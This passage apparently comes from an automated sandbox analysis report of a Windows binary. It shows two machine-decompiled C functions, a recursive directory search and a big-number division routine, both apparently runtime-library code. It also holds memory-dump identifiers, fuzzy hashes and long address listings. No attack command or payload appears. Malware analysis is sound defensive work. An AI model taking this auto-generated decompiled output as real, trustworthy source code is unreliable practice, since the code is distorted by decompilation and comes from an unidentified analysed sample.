          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ExceptionFilterUnhandled$DebuggerPresent
          • String ID:
          • API String ID: 3906539128-0
          • Opcode ID: c1ae98629a8acb677dcd4880345107d24f967616ef5a305d815f071620acea43
          • Instruction ID: f8205cdd619a7ce49656ee57fcdd9d25251ac8417adde8c24282982ebe10f040
          • Opcode Fuzzy Hash: c1ae98629a8acb677dcd4880345107d24f967616ef5a305d815f071620acea43
          • Instruction Fuzzy Hash: E431C27491121CABCB21DF68E889B9CBBB8AF18310F5045DAE40CA7291E7309BD58F44
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00219FD3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
          Download Yara Rule
          C-Code - Quality: 74%
          			E00219FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				intOrPtr _t101;
				signed int _t104;
				union _FINDEX_INFO_LEVELS _t105;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t121;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t104 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t104 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t110 = E00217B1B(_t84, _t77, 1);
					_pop(_t86);
					__eflags = _t104;
					if(_t104 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t104;
						_t40 = E0021DD71(_t86, _t110 + _t104, _t77, _a4);
						_t119 = _t118 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E0021A212(_a16, _t100, __eflags, _t110);
							E00217A50(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t104);
						_t74 = E0021DD71(_t86, _t110, _t77, _a8);
						_t119 = _t118 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00217DBB();
							asm("int3");
							_t117 = _t119;
							_t120 = _t119 - 0x150;
							_t43 =  *0x22d668; // 0x4319796a
							_v48 = _t43 ^ _t117;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t110);
							_t111 = _v332.cAlternateFileName;
							_push(_t104);
							_v372 = _t111;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E0021DDC0(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t105 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E0020E920(_t105,  &_v332, _t105, 0x140);
								_t121 = _t120 + 0xc;
								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
								_t55 = _v336;
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00219FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
											_t121 = _t121 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t112,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t102 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00215030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E00219E2B);
									}
								} else {
									_push(_t55);
									_t57 = E00219FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
									L26:
									_t105 = _t57;
								}
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									FindClose(_t112);
								}
								_t58 = _t105;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t111);
									_t58 = E00219FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
								}
							}
							__eflags = _v12 ^ _t117;
							return E0020E203(_t58, _v12 ^ _t117);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}
















































          0x00219fd8
          0x00219fd9
          0x00219fdc
          0x00219fdc
          0x00219fdf
          0x00219fdf
          0x00219fe1
          0x00219fe2
          0x00219feb
          0x00219fec
          0x00219fef
          0x00219ff2
          0x00219ff7
          0x00219ffe
          0x00219fff
          0x0021a000
          0x0021a003
          0x0021a00d
          0x0021a010
          0x0021a011
          0x0021a013
          0x0021a027
          0x0021a027
          0x0021a02a
          0x0021a034
          0x0021a039
          0x0021a03c
          0x0021a03e
          0x00000000
          0x0021a040
          0x0021a044
          0x0021a04d
          0x0021a053
          0x00000000
          0x0021a056
          0x0021a015
          0x0021a015
          0x0021a01b
          0x0021a020
          0x0021a023
          0x0021a025
          0x0021a05c
          0x0021a05e
          0x0021a05f
          0x0021a060
          0x0021a061
          0x0021a062
          0x0021a063
          0x0021a068
          0x0021a06c
          0x0021a06e
          0x0021a074
          0x0021a07b
          0x0021a07e
          0x0021a081
          0x0021a082
          0x0021a085
          0x0021a086
          0x0021a089
          0x0021a08a
          0x0021a0ab
          0x0021a0ab
          0x0021a0ad
          0x00000000
          0x00000000
          0x0021a092
          0x0021a094
          0x0021a096
          0x0021a098
          0x0021a09a
          0x0021a09c
          0x0021a09e
          0x0021a0a9
          0x00000000
          0x0021a0a9
          0x0021a09e
          0x0021a09a
          0x00000000
          0x0021a096
          0x0021a0af
          0x0021a0b1
          0x0021a0b4
          0x0021a0cd
          0x0021a0cd
          0x0021a0cf
          0x0021a0d2
          0x0021a0e2
          0x0021a0e4
          0x0021a0e4
          0x0021a0d4
          0x0021a0d4
          0x0021a0d7
          0x00000000
          0x0021a0d9
          0x0021a0d9
          0x0021a0dc
          0x00000000
          0x0021a0de
          0x0021a0de
          0x0021a0de
          0x0021a0dc
          0x0021a0d7
          0x0021a0ea
          0x0021a0f2
          0x0021a0f6
          0x0021a104
          0x0021a109
          0x0021a11e
          0x0021a120
          0x0021a126
          0x0021a129
          0x0021a15b
          0x0021a15b
          0x0021a15d
          0x0021a160
          0x0021a166
          0x0021a166
          0x0021a16d
          0x0021a187
          0x0021a187
          0x0021a196
          0x0021a19b
          0x0021a19e
          0x0021a1a0
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0021a16f
          0x0021a16f
          0x0021a175
          0x0021a177
          0x00000000
          0x0021a179
          0x0021a179
          0x0021a17c
          0x00000000
          0x0021a17e
          0x0021a17e
          0x0021a185
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0021a185
          0x0021a17c
          0x0021a177
          0x00000000
          0x0021a1a2
          0x0021a1aa
          0x0021a1b0
          0x0021a1b2
          0x0021a1b2
          0x0021a1ba
          0x0021a1bf
          0x0021a1c7
          0x0021a1ca
          0x0021a1cc
          0x0021a1e0
          0x0021a1e5
          0x0021a12b
          0x0021a12b
          0x0021a12f
          0x0021a137
          0x0021a137
          0x0021a137
          0x0021a139
          0x0021a13c
          0x0021a13f
          0x0021a13f
          0x0021a145
          0x0021a0b6
          0x0021a0b9
          0x0021a0bb
          0x00000000
          0x0021a0bd
          0x0021a0bd
          0x0021a0c3
          0x0021a0c8
          0x0021a0bb
          0x0021a14c
          0x0021a157
          0x00000000
          0x00000000
          0x00000000
          0x0021a025
          0x00219ff9
          0x00219ffb
          0x0021a057
          0x0021a05b
          0x0021a05b
          0x00000000

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID: .
          • API String ID: 0-248832578
          • Opcode ID: 214a1690c82bd310b6275bd4272d1c1d6e19f7c312db46084ace399783f88d7c
          • Instruction ID: 157a9f5d77522fb8c9e2fcd394ae0426e8575bbe5273eee62a693dafc5713d13
          • Opcode Fuzzy Hash: 214a1690c82bd310b6275bd4272d1c1d6e19f7c312db46084ace399783f88d7c
          • Instruction Fuzzy Hash: 6B31E77191024ABFCB248E78CC84EFB7BFDDB95314F1402A8F419D7251E6319D958B50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021C0B0, Relevance: 3.5, APIs: 2, Instructions: 464COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 90%
          			E0021C0B0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E0020DDA0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00220DE0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E0020DDC0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E0020DDC0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x21d6cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00220DE0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0021AA64(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0021AA64(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0021AA64(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































          0x0021c0bc
          0x0021c0bf
          0x0021c0c3
          0x0021c0cd
          0x0021c0d0
          0x0021c0d2
          0x0021c0d4
          0x0021c0e1
          0x0021c0e1
          0x0021c0e4
          0x0021c0e4
          0x0021c0e7
          0x0021c0ea
          0x0021c0ec
          0x0021c21f
          0x0021c221
          0x0021c26a
          0x0021c26e
          0x0021c274
          0x0021c223
          0x0021c225
          0x0021c228
          0x0021c22a
          0x0021c22d
          0x0021c22f
          0x0021c231
          0x0021c265
          0x0021c265
          0x0021c265
          0x0021c233
          0x0021c238
          0x0021c23e
          0x0021c23e
          0x0021c241
          0x0021c243
          0x0021c245
          0x00000000
          0x00000000
          0x0021c247
          0x0021c248
          0x0021c24b
          0x0021c24e
          0x0021c250
          0x00000000
          0x0021c252
          0x00000000
          0x0021c252
          0x00000000
          0x0021c250
          0x0021c254
          0x0021c25b
          0x0021c25f
          0x0021c263
          0x00000000
          0x00000000
          0x0021c263
          0x0021c266
          0x0021c266
          0x0021c268
          0x0021c275
          0x0021c278
          0x0021c27b
          0x0021c27e
          0x0021c27e
          0x0021c282
          0x0021c285
          0x0021c288
          0x0021c28b
          0x0021c296
          0x0021c28d
          0x0021c292
          0x0021c292
          0x0021c2a0
          0x0021c2a5
          0x0021c2a8
          0x0021c2aa
          0x0021c2b4
          0x0021c2b7
          0x0021c2be
          0x0021c2c1
          0x0021c2c4
          0x0021c2cc
          0x0021c2d2
          0x0021c2d2
          0x0021c2d2
          0x0021c2d2
          0x0021c2c4
          0x0021c2d7
          0x0021c2de
          0x0021c2de
          0x0021c2e1
          0x0021c2e4
          0x0021c516
          0x0021c516
          0x0021c2ea
          0x0021c2ea
          0x0021c2f0
          0x0021c2f3
          0x0021c2f6
          0x0021c2f9
          0x0021c2fc
          0x0021c2ff
          0x0021c302
          0x0021c302
          0x0021c305
          0x0021c30c
          0x0021c30c
          0x0021c307
          0x0021c307
          0x0021c307
          0x0021c30e
          0x0021c312
          0x0021c315
          0x0021c317
          0x0021c31a
          0x0021c321
          0x0021c324
          0x0021c327
          0x0021c332
          0x0021c335
          0x0021c33a
          0x0021c33f
          0x0021c346
          0x0021c34b
          0x0021c34d
          0x0021c34f
          0x0021c353
          0x0021c356
          0x0021c359
          0x0021c361
          0x0021c36a
          0x0021c36a
          0x0021c36c
          0x0021c36f
          0x0021c36f
          0x0021c359
          0x0021c379
          0x0021c37e
          0x0021c383
          0x0021c385
          0x0021c388
          0x0021c38a
          0x0021c38d
          0x0021c390
          0x0021c392
          0x0021c395
          0x0021c398
          0x0021c39a
          0x0021c3a1
          0x0021c3a6
          0x0021c3a9
          0x0021c3b3
          0x0021c3b5
          0x0021c3b7
          0x0021c3ba
          0x0021c3ba
          0x0021c3bc
          0x0021c3bf
          0x0021c3c2
          0x0021c3c5
          0x0021c3c8
          0x0021c39c
          0x0021c39c
          0x0021c39f
          0x00000000
          0x00000000
          0x0021c39f
          0x0021c3cb
          0x0021c3cd
          0x0021c3cf
          0x00000000
          0x0021c3d1
          0x0021c3d1
          0x0021c3d4
          0x0021c3d6
          0x0021c3d6
          0x0021c3e4
          0x0021c3e7
          0x0021c3ec
          0x0021c3ee
          0x00000000
          0x00000000
          0x0021c3f0
          0x0021c3f7
          0x0021c3f7
          0x0021c3fa
          0x0021c3fd
          0x0021c400
          0x0021c403
          0x0021c403
          0x0021c406
          0x0021c409
          0x0021c40d
          0x0021c410
          0x0021c412
          0x0021c415
          0x00000000
          0x00000000
          0x0021c417
          0x0021c415
          0x0021c3f2
          0x0021c3f2
          0x0021c3f5
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0021c3f5
          0x0021c41c
          0x0021c41c
          0x00000000
          0x0021c41c
          0x0021c419
          0x00000000
          0x0021c419
          0x0021c3d4
          0x0021c3cf
          0x0021c41f
          0x0021c41f
          0x0021c421
          0x0021c42b
          0x0021c42b
          0x0021c42e
          0x0021c430
          0x0021c432
          0x0021c434
          0x0021c439
          0x0021c43c
          0x0021c43c
          0x0021c43f
          0x0021c442
          0x0021c445
          0x0021c447
          0x0021c45c
          0x0021c45e
          0x0021c460
          0x0021c462
          0x0021c464
          0x0021c466
          0x0021c468
          0x0021c46a
          0x0021c46d
          0x0021c46d
          0x0021c471
          0x0021c473
          0x0021c479
          0x0021c47c
          0x0021c47c
          0x0021c47c
          0x0021c480
          0x0021c480
          0x0021c485
          0x0021c488
          0x0021c488
          0x0021c48d
          0x0021c48f
          0x0021c491
          0x0021c498
          0x0021c498
          0x0021c49a
          0x0021c49f
          0x0021c4a1
          0x0021c4a4
          0x0021c4a4
          0x0021c4a7
          0x0021c4b0
          0x0021c4b0
          0x0021c4b2
          0x0021c4b2
          0x0021c4b7
          0x0021c4bd
          0x0021c4c1
          0x0021c4c4
          0x0021c4c7
          0x0021c4c9
          0x0021c4c9
          0x0021c4c9
          0x0021c4ce
          0x0021c4ce
          0x0021c4d1
          0x0021c4d4
          0x0021c493
          0x0021c493
          0x0021c496
          0x00000000
          0x00000000
          0x0021c496
          0x0021c491
          0x0021c4db
          0x0021c4db
          0x0021c4dc
          0x0021c423
          0x0021c423
          0x0021c425
          0x00000000
          0x00000000
          0x0021c425
          0x0021c4ec
          0x0021c4f1
          0x0021c4f4
          0x0021c4f8
          0x0021c4f9
          0x0021c4fc
          0x0021c4ff
          0x0021c500
          0x0021c503
          0x0021c506
          0x0021c509
          0x0021c50c
          0x0021c50c
          0x0021c514
          0x0021c51b
          0x0021c51c
          0x0021c51e
          0x0021c520
          0x0021c522
          0x0021c525
          0x0021c530
          0x0021c530
          0x0021c536
          0x0021c536
          0x0021c539
          0x0021c53a
          0x0021c53a
          0x0021c530
          0x0021c53e
          0x0021c540
          0x0021c542
          0x0021c544
          0x0021c544
          0x0021c546
          0x0021c54a
          0x00000000
          0x00000000
          0x0021c54c
          0x0021c54c
          0x0021c54f
          0x0021c551
          0x00000000
          0x00000000
          0x00000000
          0x0021c551
          0x0021c544
          0x0021c553
          0x0021c55d
          0x00000000
          0x00000000
          0x00000000
          0x0021c268
          0x0021c0f2
          0x0021c0f2
          0x0021c0f2
          0x0021c0f5
          0x0021c0f8
          0x0021c0fb
          0x0021c12c
          0x0021c12e
          0x0021c179
          0x0021c17b
          0x0021c182
          0x0021c189
          0x0021c18c
